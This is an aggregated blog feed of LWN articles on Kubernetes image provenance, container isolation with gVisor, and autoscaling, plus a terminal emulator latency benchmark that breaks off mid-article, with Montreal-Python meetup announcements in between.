"Security is hard" is a tautology, especially in the fast-moving world of container orchestration. We have previously covered various aspects of Linux container security through, for example, the Clear Containers implementation or the broader question of Kubernetes and security, but those are mostly concerned with container isolation; they do not address the question of trusting a container's contents. What is a container running? Who built it and when? Even assuming we have good programmers and solid isolation layers, propagating that good code around a Kubernetes cluster and making strong assertions on the integrity of that supply chain is far from trivial. The 2018 KubeCon + CloudNativeCon Europe event featured some projects that could eventually solve that problem.

Image provenance

A first talk, by Adrian Mouat, provided a good introduction to the broader question of "establishing image provenance and security in Kubernetes" (video, slides [PDF]). Mouat compared software to food you get from the supermarket: "you can actually tell quite a lot about the product; you can tell the ingredients, where it came from, when it was packaged, how long it's good for". He explained that "all livestock in Europe have an animal passport so we can track its movement throughout Europe and beyond". That "requires a lot of work, and time, and money, but we decided that this was worthwhile doing so that we know [our food is] safe to eat. Can we say the same thing about the software running in our data centers?" This is especially a problem in complex systems like Kubernetes; containers have inherent security and licensing concerns, as we have recently discussed.

You should be able to easily tell what is in a container: what software it runs, where it came from, how it was created, and whether it has any known security issues, he said. Mouat also expects those properties to be provable and verifiable with strong cryptographic assertions. Kubernetes can make this difficult. Mouat gave a demonstration of how, by default, the orchestration framework will allow different versions of the same container to run in parallel. In his scenario, this is because the default image pull policy (ifNotPresent) might pull a new version on some nodes and not others. The problem arises because of an inconsistency between the way Docker and Kubernetes treat image tags: the former treats them as mutable and the latter as immutable. Mouat said that "the default semantics for pulling images in Kubernetes are confusing and dangerous." The solution here is to deploy only images with tags that refer to a unique version of a container, for example by embedding a Git hash or unique version number in the image tag. Obviously, changing the policy to AlwaysPullImages will also help in solving the particular issue he demonstrated, but will create more image churn in the cluster.
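As a sketch of that advice (the registry name, tag and digest below are placeholders; the field names are the standard pod-spec ones, shown here as a Python dict mirroring the YAML manifest), a container entry pinned to a unique version looks roughly like this:

# Pin the image so that every node runs exactly the same bits.
# The registry, tag and digest values are placeholders.
container = {
    "name": "web",
    # Option 1: a tag that encodes a unique version (e.g. a Git hash):
    # "image": "registry.example.com/web:1.4.2-3f2a9c1",
    # Option 2: pin by content digest, which cannot be re-pointed:
    "image": ("registry.example.com/web@sha256:"
              "0123456789abcdef0123456789abcdef"
              "0123456789abcdef0123456789abcdef"),
    # Always check with the registry, at the cost of more image churn.
    "imagePullPolicy": "Always",
}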

But that's only a small part of the problem; even if Kubernetes actually runs the correct image, how can you tell what is actually in that image? In theory, this should be easy. Docker seems like the perfect tool to create deterministic images that consist exactly of what you asked for: a clean and controlled, isolated environment. Unfortunately, containers are far from reproducible and the problem begins on the very first line of a Dockerfile. Mouat gave the example of a FROM debian line, which can mean different things at different times. It should normally refer to Debian "stable", but that's actually a moving target; Debian makes new stable releases once in a while, and there are regular security updates. So what first looks like a static target is actually moving. Many Dockerfiles will happily fetch random source code and binaries from the network. Mouat encouraged people to at least checksum the downloaded content to prevent basic attacks and problems.
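The checksumming advice is straightforward to apply at build time; a minimal sketch of the idea (the URL and expected digest are placeholders) is simply to refuse any downloaded content whose digest does not match a pinned value:

import hashlib
import urllib.request

# Placeholders: pin the URL and its known-good SHA-256 digest.
URL = "https://example.com/some-build-dependency.tar.gz"
EXPECTED_SHA256 = "replace-with-the-known-good-digest"

def fetch_verified(url, expected_sha256):
    """Download url and fail loudly if the content does not match."""
    data = urllib.request.urlopen(url).read()
    digest = hashlib.sha256(data).hexdigest()
    if digest != expected_sha256:
        raise RuntimeError("checksum mismatch: got %s" % digest)
    return data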

Unfortunately, all this still doesn't get us reproducible builds since container images include file timestamps, build identifiers, and image creation time that will vary between builds, making container images hard to verify through bit-wise comparison or checksums. One solution there is to use alternative build tools like Bazel that allow you to build reproducible images. Mouat also added that there is "tension between reproducibility and keeping stuff up to date" because using hashes in manifests will make updates harder to deploy. By using FROM debian, you automatically get updates when you rebuild that container. Using FROM debian:stretch-20180426 will get you a more reproducible container, but you'll need to change your manifest regularly to follow security updates. Once we know what is in our container, there is at least a standard in the form of the OCI specification that allows attaching annotations to document the contents of containers.

Another problem is making sure containers are up to date, a "weirdly hard" question to answer according to Mouat: "why can't I ask my registry [if] there is new version of [a] tag, but as far as I know, there's no way you can do that." Mouat literally hand-waved at a slide showing various projects designed to scan container images for known vulnerabilities, introducing Aqua, Clair, NeuVector, and Twistlock. Mouat said we need a more "holistic" solution than the current whack-a-mole approach. His company is working on such a product called Trow, but not much information about it was available at the time of writing.

The long tail of the supply chain

Verifying container images is exactly the kind of problem Notary is designed to solve. Notary is a server "that allows anyone to have trust over arbitrary collections of data". In practice, that can be used by the Docker daemon as an additional check before fetching images from the registry. This allows operators to approve images with cryptographic signatures before they get deployed in the cluster.

Notary implements The Update Framework (TUF), a specification covering the nitty-gritty details of signatures, key rotation, and delegation. It keeps signed hashes of container images that can be used for verification; it can be deployed by enabling Docker's "content trust" in any Docker daemon, or by configuring a custom admission controller with a web hook in Kubernetes. In another talk (slides [PDF], video) Liam White and Michael Hough covered the basics of Notary's design and how it interacts with Docker. They also introduced Portieris as an admission controller hook that can implement a policy like "allow any image from the LWN Docker registry as long as it's signed by your favorite editor". Policies can be scoped by namespace as well, which can be useful in multi-tenant clusters. The downside of Portieris is that it supports only IBM Cloud Notary servers, because the images need to be explicitly mapped between the Notary server and the registry. The IBM team only knows how to map its own images, but the speakers said they were open to contributions there.

A limitation of Notary is that it looks only at the last step of the build chain; in itself, it provides no guarantees on where the image comes from, how the image was built, or what it's made of. In yet another talk (slides [PDF] video), Wendy Dembowski and Lukas Puehringer introduced a possible solution to that problem: two projects that work hand-in-hand to provide end-to-end verification of the complete container supply chain. Puehringer first introduced the in-toto project as a tool to authenticate the integrity of individual build steps: code signing, continuous integration (CI), and deployment. It provides a specification for "open and extensible" metadata that certifies how each step was performed and the resulting artifacts. This could be, at the source step, as simple as a Git commit hash or, at the CI step, a build log and artifact checksums. All steps are "chained" as well, so that you can track which commit triggered the deployment of a specific image. The metadata is cryptographically signed by role keys to provide strong attestations as to the provenance and integrity of each step. The in-toto project is supervised by Justin Cappos, who also works on TUF, so it shares some of its security properties and integrates well with the framework. Each step in the build chain has its own public/private key pair, with support for role delegation and rotation.
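To give a rough idea of what that per-step metadata contains, here is a sketch of "link" metadata for a build step (the field names are paraphrased from the in-toto link format and the hashes are placeholders; consult the in-toto specification for the authoritative schema):

# Rough sketch of in-toto-style "link" metadata for one build step.
# Field names are paraphrased and the hash values are placeholders.
link = {
    "_type": "link",
    "name": "build",
    # What the step consumed...
    "materials": {"src/main.c": {"sha256": "aaaa..."}},
    # ...what it produced...
    "products": {"bin/app": {"sha256": "bbbb..."}},
    # ...and how it was run.
    "command": ["make", "all"],
    "byproducts": {"return-value": 0, "stdout": "", "stderr": ""},
}
# The structure is then signed with the key assigned to the "build"
# role, chaining this step to the ones before and after it.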

In-toto is a generic framework allowing a complete supply chain verification by providing "attestations" that a given artifact was created by the right person using the right source. But it does not necessarily provide the hooks to do those checks in Kubernetes itself. This is where Grafeas comes in, by providing a global API to read and store metadata. That can be package versions, vulnerabilities, license or vulnerability scans, builds, images, deployments, and attestations such as those provided by in-toto. All of those can then be used by the Kubernetes admission controller to establish a policy that regulates image deployments. Dembowski referred to this tutorial by Kelsey Hightower as an example configuration to integrate Grafeas in your cluster. According to Puehringer: "It seems natural to marry the two projects together because Grafeas provides a very well-defined API where you can push metadata into, or query from, and is well integrated in the cloud ecosystem, and in-toto provides all the steps in the chain."

Dembowski said that Grafeas is already in use at Google and it has been found useful to keep track of metadata about containers. Grafeas can keep track of what each container is running, who built it, when (sometimes vulnerable) code was deployed, and make sure developers do not ship containers built on untrusted development machines. This can be useful when a new vulnerability comes out and administrators scramble to figure out if or where affected code is deployed.

Puehringer explained that in-toto's reference implementation is complete and he is working with various Linux distributions to get them to use link metadata to have their package managers perform similar verification.

Conclusion

The question of container trust hardly seems resolved at all; the available solutions are complex and would be difficult to deploy for Kubernetes rookies like me. However, it seems that Kubernetes could make small improvements to improve security and auditability, the first of which is probably setting the image pull policy to a more reasonable default. In his talk, Mouat also said it should be easier to make Kubernetes fetch images only from a trusted registry instead of allowing any arbitrary registry by default.

Beyond that, cluster operators wishing to have better control over their deployments should start looking into setting up Notary with an admission controller, maybe Portieris if they can figure out how to make it play with their own Notary servers. Considering the apparent complexity of Grafeas and in-toto, I would assume that those would probably be reserved only to larger "enterprise" deployments but who knows; Kubernetes may be complex enough as it is that people won't mind adding a service or two in there to improve its security. Keep in mind that complexity is an enemy of security, so operators should be careful when deploying solutions unless they have a good grasp of the trade-offs involved.

This article first appeared in the Linux Weekly News.


Updates in container isolation

Anarcat - Wed, 05/16/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

At KubeCon + CloudNativeCon Europe 2018, several talks explored the topic of container isolation and security. The last year saw the release of Kata Containers which, combined with the CRI-O project, provided strong isolation guarantees for containers using a hypervisor. During the conference, Google released its own hypervisor called gVisor, adding yet another possible solution for this problem. Those new developments prompted the community to work on integrating the concept of "secure containers" (or "sandboxed containers") deeper into Kubernetes. This work is now coming to fruition; it prompts us to look again at how Kubernetes tries to keep the bad guys from wreaking havoc once they break into a container.

Attacking and defending the container boundaries

Tim Allclair's talk (slides [PDF], video) was all about explaining the possible attacks on secure containers. To simplify, Allclair said that "secure is isolation, even if that's a little imprecise" and explained that isolation is directional across boundaries: for example, a host might be isolated from a guest container, but the container might be fully visible from the host. So there are two distinct problems here: threats from the outside (attackers trying to get into a container) and threats from the inside (attackers trying to get out of a compromised container). Allclair's talk focused on the latter. In this context, sandboxed containers are concerned with threats from the inside; once the attacker is inside the sandbox, they should not be able to compromise the system any further.

Attacks can take multiple forms: untrusted code provided by users in multi-tenant clusters, un-audited code fetched from random sites by trusted users, or trusted code compromised through an unknown vulnerability. According to Allclair, defending a system from a compromised container is harder than defending a container from external threats, because there is a larger attack surface. While outside attackers only have access to a single port, attackers on the inside often have access to the kernel's extensive system-call interface, a multitude of storage backends, the internal network, daemons providing services to the cluster, hardware interfaces, and so on.

Taking those vectors one by one, Allclair first looked at the kernel and said that there were 169 code execution vulnerabilities in the Linux kernel in 2017. He admitted this was a bit of fear mongering; it indeed was a rather unusual year and "most of those were in mobile device drivers". These vulnerabilities are not really a problem for Kubernetes unless you run it on your phone. Allclair said that at least one attendee at the conference was probably doing exactly that; as it turns out, some people have managed to run Kubernetes on a vacuum cleaner. Container runtimes implement all sorts of mechanisms to reduce the kernel's attack surface: Docker has seccomp profiles, but Kubernetes turns those off by default. Runtimes will use AppArmor or SELinux rule sets. There are also ways to run containers as non-root, which was the topic of a pun-filled separate talk as well. Unfortunately, those mechanisms do not fundamentally solve the problem of kernel vulnerabilities. Allclair cited the Dirty COW vulnerability as a classic example of a container escape through race conditions on system calls that are allowed by security profiles.

The proposed solution to this problem is to add a second security boundary. This is apparently an overarching principle at Google, according to Allclair: "At Google, we have this security principle that between any untrusted code and user data there have to be at least two distinct security boundaries, so that means two independent security mechanisms need to fail in order for that untrusted code to get at that user data."

Adding another boundary makes attacks harder to accomplish. One such solution is to use a hypervisor like Kata Containers or gVisor. Those new runtimes depend on a sandboxed setting that is still in the proposal stage in the Kubernetes API.

gVisor as an extra boundary

Let's look at gVisor as an example hypervisor. Google spent five years developing the project in the dark before sharing it with the world. At KubeCon, it was introduced in a keynote and a more in-depth talk (slides [PDF], video) by Dawn Chen and Zhengyu He. gVisor is a user-space kernel that implements a subset of the Linux kernel API, but which was written from scratch in Go. The idea is to have an independent kernel that reduces the attack surface; while the Linux kernel has 20 million lines of code, at the time of writing gVisor only has 185,000, which should make it easier to review and audit. It provides a cleaner and simpler interface: no hardware drivers, interrupts, or I/O port support to implement, as the host operating system takes care of all that mess.

As shown in a diagram in the talk slides, gVisor has a component called "sentry" that implements the core of the system-call logic. It uses ptrace() out of the box for portability reasons, but can also work with KVM for better security and performance, as ptrace() is slow and racy. Sentry can use KVM to map processes to CPUs and provide lower-level support like privilege separation and memory management. He suggested thinking of gVisor as a "layered solution" to provide isolation, as it also uses seccomp filters and namespaces. He explained how it differed from user-mode Linux (UML): while UML is a port of Linux to user space, gVisor actually reimplements the Linux system calls (211 of the 319 x86-64 system calls) using only 64 system calls in the host system. Another key difference from other systems, like unikernels or Google's Native Client (NaCl), is that it can run unmodified binaries. To prevent classes of attacks relying on the open() system call, gVisor also forbids any direct filesystem access; all filesystem operations go through a second process called the gopher that enforces access permissions, in another example of a double security boundary.

According to He, gVisor has a 150ms startup time and 15MB overhead, close to Kata Containers startup times, but smaller in terms of memory. He said the approach is good for small containers in high-density workloads. It is not so useful for trusted images (because it's not required), workloads that make heavy use of system calls (because of the performance overhead), or workloads that require hardware access (because that's not available at all). Even though gVisor implements a large number of system calls, some functionality is missing. There is no System V shared memory, for example, which means PostgreSQL does not work under gVisor. A simple ping might not work either, as gVisor lacks SOCK_RAW support. Linux has been in use for decades now and is more than just a set of system calls: interfaces like /proc and sysfs also make Linux what it is. Of those, gVisor currently implements only a subset of /proc, with the result that some containers will not work with gVisor without modification, for now.

As an aside, the new hypervisor does allow for experimentation and development of new system calls directly in user space. The speakers confirmed this was another motivation for the project; the hope is that having a user-space kernel will allow faster iteration than working directly in the Linux kernel.

Escape from the hypervisor

Of course, hypervisors like gVisor are only a part of the solution to pod security. In his talk, Allclair warned that even with a hypervisor, there are still ways to escape a container. He cited the CVE-2017-1002101 vulnerability, which allows hostile container images to take over a host through specially crafted symbolic links. Like native containers, hypervisors like Kata Containers also allow the guest to mount filesystems across the container boundary, so they are vulnerable to such an attack.

Kubernetes fixed that specific bug, but a general solution is still in the design phase. Allclair said that ephemeral storage should be treated as opaque to the host, making sure that the host never interacts directly with image files and just passes them down to the guest untouched. Similarly, runtimes should "mount block volumes directly into the sandbox, not onto the host". Network filesystems are trickier; while it's possible to mount (say) a Ceph filesystem in the guest, that means the access credentials now reside within the guest, which moves the security boundary into the untrusted container.

Allclair outlined networking as another attack vector: Kubernetes exposes a lot of unauthenticated services on the network by default. In particular, the API server is a gold mine of information about the cluster. Another attack vector is untrusted data flows from containers to the user. For example, container logs travel through various Kubernetes components, and some components, like Fluentd, will end up parsing those logs directly. Allclair said that many different programs are "looking at untrusted data; if there's a vulnerability there, it could lead to remote code execution". When he looked at the history of vulnerabilities in that area, he could find no direct code execution, but "one of the dependencies in Fluentd for parsing JSON has seven different bugs with segfault issues so we can see that could lead to a memory vulnerability". As a possible solution to such issues, Allclair proposed isolating components in their own (native, as opposed to sandboxed) containers, which might be sufficient because Fluentd acts as a first trusted boundary.

Conclusion

A lot of work is happening to improve what is widely perceived as defective container isolation in the Linux kernel. Some take the approach of trying to run containers as regular users ("root-less containers") and rely on the Linux kernel's user-isolation properties. Others found this relies too much on the security of the kernel and use separate hypervisors, like Kata Containers and gVisor. The latter seems especially interesting because it is lightweight and doesn't add much attack surface. In comparison, Kata Containers relies on a kernel running inside the container, which actually expands the attack surface instead of reducing it. The proposed API for sandboxed containers is currently experimental in the containerd and CRI-O projects; Allclair expects the API to ship in alpha as part of the Kubernetes 1.12 release.

It's important to keep in mind that hypervisors are not a panacea: they do not support all workloads because of compatibility and performance issues. A hypervisor is only a partial solution; Allclair said the next step is to provide hardened interfaces for storage, logging, and networking and encouraged people to get involved in the node special interest group and the proposal [Google Docs] on the topic.

This article first appeared in the Linux Weekly News.


Montreal-Python 72: Call for speakers

Montreal Python - dim, 05/13/2018 - 23:00

We are looking for lightning talks (5min) submissions for our next event. Send your proposals at team@montrealpython.org

When

June 11th, 2018 6PM to 9PM

Where

To be determined


Autoscaling for Kubernetes workloads

Anarcat - dim, 05/13/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

Technologies like containers, clusters, and Kubernetes offer the prospect of rapidly scaling the available computing resources to match variable demands placed on the system. Actually implementing that scaling can be a challenge, though. During KubeCon + CloudNativeCon Europe 2018, Frederic Branczyk from CoreOS (now part of Red Hat) held a packed session to introduce a standard and officially recommended way to scale workloads automatically in Kubernetes clusters.

Kubernetes has had an autoscaler since the early days, but only recently did the community implement a more flexible and extensible mechanism to make decisions on when to add more resources to fulfill workload requirements. The new API integrates not only the Prometheus project, which is popular in Kubernetes deployments, but also any arbitrary monitoring system that implements the standardized APIs.

The old and new autoscalers

Branczyk first covered the history of the autoscaler architecture and how it has evolved through time. Kubernetes, since version 1.2, features a horizontal pod autoscaler (HPA), which dynamically allocates resources depending on the detected workload. When the load becomes too high, the HPA increases the number of pod replicas and, when the load goes down again, it removes superfluous copies. In the old HPA, a component called Heapster would pull usage metrics from the internal cAdvisor monitoring daemon and the HPA controller would then scale workloads up or down based on those metrics.

Unfortunately, the controller would only make decisions based on CPU utilization, even though Heapster provides other metrics like disk, memory, or network usage. According to Branczyk, while in theory any workload can be converted to a CPU-bound problem, this is an inconvenient limitation, especially when implementing higher-level service level agreements. For example, an arbitrary agreement like "process 95% of requests within 100 milliseconds" would be difficult to represent as a CPU-usage problem. Another limitation is that the Heapster API was only loosely defined and never officially adopted as part of the larger Kubernetes API. Heapster also required the help of a storage backend like InfluxDB or Google's Stackdriver to store samples, which made deploying an HPA challenging.

In late 2016, the "autoscaling special interest group" (SIG autoscaling) decided that the pipeline needed a redesign that would allow scaling based on arbitrary metrics from external monitoring systems. The result is that Kubernetes 1.6 shipped with a new API specification defining how the autoscaler integrates with those systems. Having learned from the Heapster experience, the developers specified the new API, but did not implement it for any specific system. This shifts responsibility of maintenance to the monitoring vendors: instead of "dumping" their glue code in Heapster, vendors now have to maintain their own adapter conforming to a well-defined API to get certified.

The new specification defines core metrics like CPU, memory, and disk usage. Kubernetes provides a canonical implementation of those metrics through the metrics server, a stripped-down version of Heapster. The metrics server provides the core metrics required by Kubernetes so that scheduling, autoscaling, and things like kubectl top work out of the box. This means that any Kubernetes 1.8 cluster now supports autoscaling using those metrics out of the box: for example, minikube and Google's Kubernetes Engine both offer a native metrics server without an external database or monitoring system.

In terms of configuration syntax, the change is minimal. Here is an example of how to configure the autoscaler in earlier Kubernetes releases, taken from the OpenShift Container Platform documentation:

apiVersion: extensions/v1beta1
kind: HorizontalPodAutoscaler
metadata:
  name: frontend
spec:
  scaleRef:
    kind: DeploymentConfig
    name: frontend
    apiVersion: v1
    subresource: scale
  minReplicas: 1
  maxReplicas: 10
  cpuUtilization:
    targetPercentage: 80

The new API configuration is more flexible:

apiVersion: autoscaling/v2beta1
kind: HorizontalPodAutoscaler
metadata:
  name: hpa-resource-metrics-cpu
spec:
  scaleTargetRef:
    apiVersion: apps/v1beta1
    kind: ReplicationController
    name: hello-hpa-cpu
  minReplicas: 1
  maxReplicas: 10
  metrics:
  - type: Resource
    resource:
      name: cpu
      targetAverageUtilization: 50

Notice how the cpuUtilization field is replaced by a more flexible metrics field that targets CPU utilization, but can support other core metrics like memory usage.

The ultimate goal of the new API, however, is to support arbitrary metrics, through the custom metrics API. This behaves like the core metrics, except that Kubernetes does not ship or define a set of custom metrics directly, which is where systems like Prometheus come in. Branczyk demonstrated the k8s-prometheus-adapter, which connects any Prometheus metric to the Kubernetes HPA, allowing the autoscaler to add new pods to reduce request latency, for example. Those metrics are bound to Kubernetes objects (e.g. pod, node, etc.) but an "external metrics API" was also introduced in the last two months to allow arbitrary metrics to influence autoscaling. This could allow Kubernetes to scale up a workload to deal with a larger load on an external message broker service, for example.

Here is an example of the custom metrics API pulling metrics from Prometheus to make sure that each pod handles around 200 requests per second:

metrics:
- type: Pods
  pods:
    metricName: http_requests
    targetAverageValue: 200

Here http_requests is a metric exposed by the Prometheus server that reports how many requests each pod is processing. To avoid putting too much load on each pod, the HPA will then keep this number close to the target value by spawning or killing pods as appropriate.
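
The scaling rule behind this behavior is a simple proportion documented for the HPA: the desired replica count is the current count multiplied by the ratio of the observed metric to its target, rounded up. A minimal Python sketch of that calculation (the function name and sample numbers are made up for illustration):

import math

def desired_replicas(current_replicas, current_value, target_value):
    # Proportional rule: scale the replica count by the ratio of the
    # observed per-pod metric to its target, rounding up.
    return math.ceil(current_replicas * current_value / target_value)

# Four pods averaging 350 requests per second against a 200 rps target
# would be scaled up to ceil(4 * 350 / 200) = 7 replicas.
print(desired_replicas(4, 350, 200))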

Upcoming features

The SIG seems to have rounded everything up quite neatly. The next step is to deprecate Heapster: as of 1.10, all critical parts of Kubernetes use the new API, so a discussion is under way in another group (SIG instrumentation) to finish moving away from the older design.

Another thing the community is looking into is vertical scaling. Horizontal scaling is fine for certain workloads, like caching servers or application frontends, but database servers, most notably, are harder to scale by just adding more replicas; in this case what an autoscaler should do is increase the size of the replicas instead of their numbers. Kubernetes supports this through the vertical pod autoscaler (VPA). It is less practical than the HPA because there is a physical limit to the size of individual servers that the autoscaler cannot exceed, while the HPA can scale up as long as you add new servers. According to Branczyk, the VPA is also more "complicated and fragile, so a lot more thought needs to go into that." As a result, the VPA is currently in alpha. It is not fully compatible with the HPA and is relevant only in cases where the HPA cannot do the job: for example, workloads where there is only a single pod or a fixed number of pods like StatefulSets.

Branczyk gave a set of predictions for other improvements that could come down the pipeline. One issue he identified is that, while the HPA and VPA can scale pods, there is a different Cluster Autoscaler (CA) that manages nodes, which are the actual machines running the pods. The CA allows a cluster to move pods between the nodes to remove underutilized nodes or create new nodes to respond to demand. It's similar to the HPA, except the HPA cannot provision new hardware resources like physical machines on its own: it only creates new pods on existing nodes. The idea here is to combine the two projects into a single one to keep a uniform interface for what is really the same functionality: scaling a workload by giving it more resources.

Another hope is that OpenMetrics will emerge as a standard for metrics across vendors. This process seems to be well under way with Kubernetes already using the Prometheus library, which serves as a basis for the standard, and with commercial vendors like Datadog supporting the Prometheus API as well. Another area of possible standardization is the gRPC protocol used in some Kubernetes clusters to communicate between microservices. Those endpoints can now expose metrics through "interceptors" that get executed before the request is passed to the application. One of those interceptors is the go-grpc-prometheus adapter, which enables Prometheus to scrape metrics from any gRPC-enabled service. The ultimate goal is to have standard metrics deployed across an entire cluster, allowing the creation of reusable dashboards, alerts, and autoscaling mechanisms in a uniform system.

Conclusion

This session was one of the most popular of the conference, which shows a deep interest in this key feature of Kubernetes deployments. It was great to see Branczyk, who is involved with the Prometheus project as well, work on standardization so other systems can work with Kubernetes.

The speed at which APIs change is impressive; in only a few months, the community upended a fundamental component of Kubernetes and replaced it with a new API that users will need to become familiar with. Given the flexibility and clarity of the new API, it is a small cost to pay to represent business logic inside such a complex system. Any simplification will surely be welcome in the maelstrom of APIs and subsystems that Kubernetes has become.

A video of the talk and slides [PDF] are available. SIG autoscaling members Marcin Wielgus and Solly Ross presented an introduction (video) and deep dive (video) talks that might be interesting to our readers who want all the gory details about Kubernetes autoscaling.

This article first appeared in the Linux Weekly News.


Montréal-Python 71 - Burning Yeti

Montreal Python - dim, 04/29/2018 - 23:00

Enjoy our May meetup just in time before PyCon US with these amazing speakers - two of whom will be presenting at PyCon!

Please RSVP on Meetup

Thanks to Google Montreal for sponsoring the event!

Presentations

Survival analysis for conversion rates - Tristan Boudreault

What percentage of your users will spend? Typically, analysts use the conversion rate to assess how successful a website is at converting trial users into paying ones. But is this calculation giving us results that are lower than reality? With a talk rich in examples, Tristan will show how Shopify reframes the traditional conversion questions in survival analysis terms.

Data Science at Shopify - Françoise Provencher

Françoise is a data science technical lead at Shopify, a multi-channel commerce platform that has a decade's worth of data on a very diverse set of businesses. We'll hear about how Python is particularly useful when it comes to understanding Shopify's user base by sifting through tons of data.

This presentation will be in English.

Integrate Geocode data with Python - Jean Luc Semedo

Applications that integrate geolocation features are more and more in demand. With Python, there are many libraries that handle geolocation natively and very simply. During this presentation we will take a quick look at a few of them: Geopy, pyproj, Mapnik, GeoDjango...

Jean Luc Semedo, freelance back-end and mobile developer

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:30PM - End of the event
  • 9:00PM - Benelux
When

Monday, May 7th, 2018 at 6:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC


Call for speaker - Montréal-Python 71 - Burning Yeti

Montreal Python - dim, 04/15/2018 - 23:00

Hey!

We are looking for speakers for our next Montreal-Python meetup. Submit your proposals (up to 30 minutes) at team@montrealpython.org, or come join us in our Slack at http://slack.mtlpy.org/ if you would like to discuss it.

Cheers!

When

Monday, May 7th, 2018, 6:00PM-9:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC

Full event info: http://montrealpython.org/en/2018/04/mp71


A look at terminal emulators, part 2

Anarcat - sam, 04/14/2018 - 19:00

This article is the second in a two-part series about terminal emulators.

A comparison of the feature sets for a handful of terminal emulators was the subject of a recent article; here I follow that up by examining the performance of those terminals. This might seem like a lesser concern, but as it turns out, terminals exhibit surprisingly high latency for such fundamental programs. I also examine what is traditionally considered "speed" (but is really scroll bandwidth) and memory usage, with the understanding that the impact of memory use is less than it was when I looked at this a decade ago (in French).

Latency

After thorough research on terminal emulator performance, I have come to the conclusion that latency is its most important aspect. In his Typing with pleasure article, Pavel Fatin reviewed the latency of various text editors and hinted that terminal emulators might be slower than the fastest text editors. That is what eventually led me to run my own tests on terminal emulators and write this series.

But what is latency and why does it matter? In his article, Fatin defined latency as "a delay between the keystroke and corresponding screen update" and quoted the Handbook of Human-Computer Interaction which says: "Delay of visual feedback on a computer display have important effects on typist behavior and satisfaction."

Fatin explained that latency has more profound effects than just satisfaction: "typing becomes slower, more errors occur, eye strain increases, and muscle strain increases". In other words, latency can lead to typos but also to lesser code quality as it imposes extra cognitive load on the brain. But worse, "eye and muscle strain increase" seems to imply that latency can also lead to physical repetitive strain injuries.

Some of those effects have been known for a long time, with some results published in the Ergonomics journal in 1976 showing that a hundred-millisecond delay "significantly impairs the keying speed". More recently, the GNOME Human Interface Guidelines set the acceptable response time at ten milliseconds and, pushing this limit down even further, this video from Microsoft Research shows that the ideal target might even be as low as one millisecond.

Fatin performed his tests on editors, but he created a portable tool called Typometer that I used to test latency in terminal emulators. Keep in mind that the test is a simulation: in reality, we also need to take into account input (keyboard, USB controller, etc.) and output (graphics card and monitor buffers) latency. Those add up to more than 20ms in typical configurations, according to Fatin. With more specialized "gaming" hardware, the bare minimum is around three milliseconds. There is therefore little room for applications to add any latency to the pipeline. Fatin's goal is to bring that extra latency down to one millisecond, or even to achieve zero-latency typing, which was released as part of IntelliJ IDEA 15. Here are my measurements, which include some text editors, showing that my results are consistent with Fatin's (all times in milliseconds):

Program         mean  std   min   90%    max
uxterm           1.7  0.3   0.7   2      2.4
mlterm           1.8  0.3   0.7   2.2    2.5
Vim (Athena)     2.8  1.1   0.4   3.5   12.7
Vim (GTK2)       3.9  1.2   0.7   4.8   11.9
Emacs            4.8  2.3   0.5   5.8   32.5
gedit            8.9  3.4   2.8  12.5   14.2
Konsole         13.4  1.2  11.5  15     16.1
Alacritty       15.1  1.2  12.8  15.9   26.3
st              15.7  3.9  10.6  19.4   19.6
Vim (GTK3)      16.5  7.9   0.4  21.9   27.2
urxvt           18.3  0.3  17.3  18.7   19
pterm           23.4  0.9  21.7  24.5   25.4
GNOME Terminal  27.1  1    25.9  27.5   39.3
Xfce Terminal   27.4  0.4  26.4  27.9   28.7
Terminator      28.1  0.7  26.4  29     29.4

The first thing that struck me is that old programs like xterm and mlterm have the best response time, with a worst-case latency (2.4ms) better than the best case of all the other terminals (10.6ms for st). No modern terminal crosses the ten-millisecond threshold. In particular, Alacritty doesn't seem to live up to its "fastest terminal emulator in existence" claim either, although results have improved since I first tested the program in July 2017. Indeed, the project seems to be aware of the situation and is working on improving the display pipeline with threads. We can also note that Vim using GTK3 is slower than its GTK2 counterpart by an order of magnitude. It may therefore be that the GTK3 framework introduces extra latency, as we can also observe that other GTK3-based terminals (Terminator, Xfce4 Terminal, and GNOME Terminal, for example) have higher latency.

You might not notice those differences. As Fatin explains: "one does not necessarily need to perceive latency consciously to be affected by it". Fatin also warns about standard deviation (the std column above and the width of error bars in the graph): "any irregularities in delay durations (so called jitter) pose additional problem because of their inherent unpredictability".

The graph above is from a clean Debian 9 (stretch) profile with the i3 window manager. That environment gives the best results in the latency test: as it turns out, GNOME introduces about 20ms of latency to all measurements. A possible explanation could be that there are programs running that synchronously handle input events: Fatin gives the example of Workrave, which adds latency by processing all input events synchronously. By default, GNOME also includes a compositing window manager (Mutter), an extra buffering layer that adds at least eight milliseconds in Fatin's tests.

In the graph above, we can see the same tests performed on Fedora 27 with GNOME running on X.org. The change is drastic; latency at least doubled and in some cases is ten times larger. Forget the one millisecond target: all terminals go far beyond the ten milliseconds budget. The VTE family gets closer to fifty milliseconds with Terminology and GNOME Terminal having spikes well above that threshold. We can also see there's more jitter in those tests. Even with the added latency, we can see that mlterm and, to a lesser extent xterm still perform better than their closest competitors, Konsole and st.

Scrolling speed

The next test is the traditional "speed" or "bandwidth" test that measures how fast the terminal can scroll by displaying a large amount of text on the terminal at once. The mechanics of the test vary; the original test I found was simply to generate the same test string repeatedly using the seq command. Other tests include one from Thomas E. Dickey, the xterm maintainer, which dumps the terminfo.src file repeatedly. In another review of terminal performance, Dan Luu uses a base32-encoded string of random bytes that is simply dumped on the terminal with cat. Luu considers that kind of test to be "as useless a benchmark as I can think of" and suggests using the terminal's responsiveness during the test as a metric instead. Dickey also dismisses that test as misleading. Yet both authors recognize that bandwidth can be a problem: Luu discovered the Emacs Eshell hangs while showing large files and Dickey implemented an optimization to work around the perceived slowness of xterm. There is therefore still some value in this test as the rendering process varies a lot between terminals; it also serves as a good test harness for testing other parameters.
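
A minimal Python sketch of the same idea - flood the terminal with text and time how long it takes to drain - looks like this (the tests in this article used seq and the other commands described above, so treat this only as a rough approximation):

import sys
import time

LINES = 100000
payload = "0123456789" * 8  # an 80-character test string

start = time.monotonic()
for _ in range(LINES):
    sys.stdout.write(payload + "\n")
sys.stdout.flush()
elapsed = time.monotonic() - start

# Writes to a terminal block on the pty, so the elapsed time roughly
# reflects how fast the terminal consumes and renders the output.
print("rendered %d lines in %.2fs" % (LINES, elapsed), file=sys.stderr)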

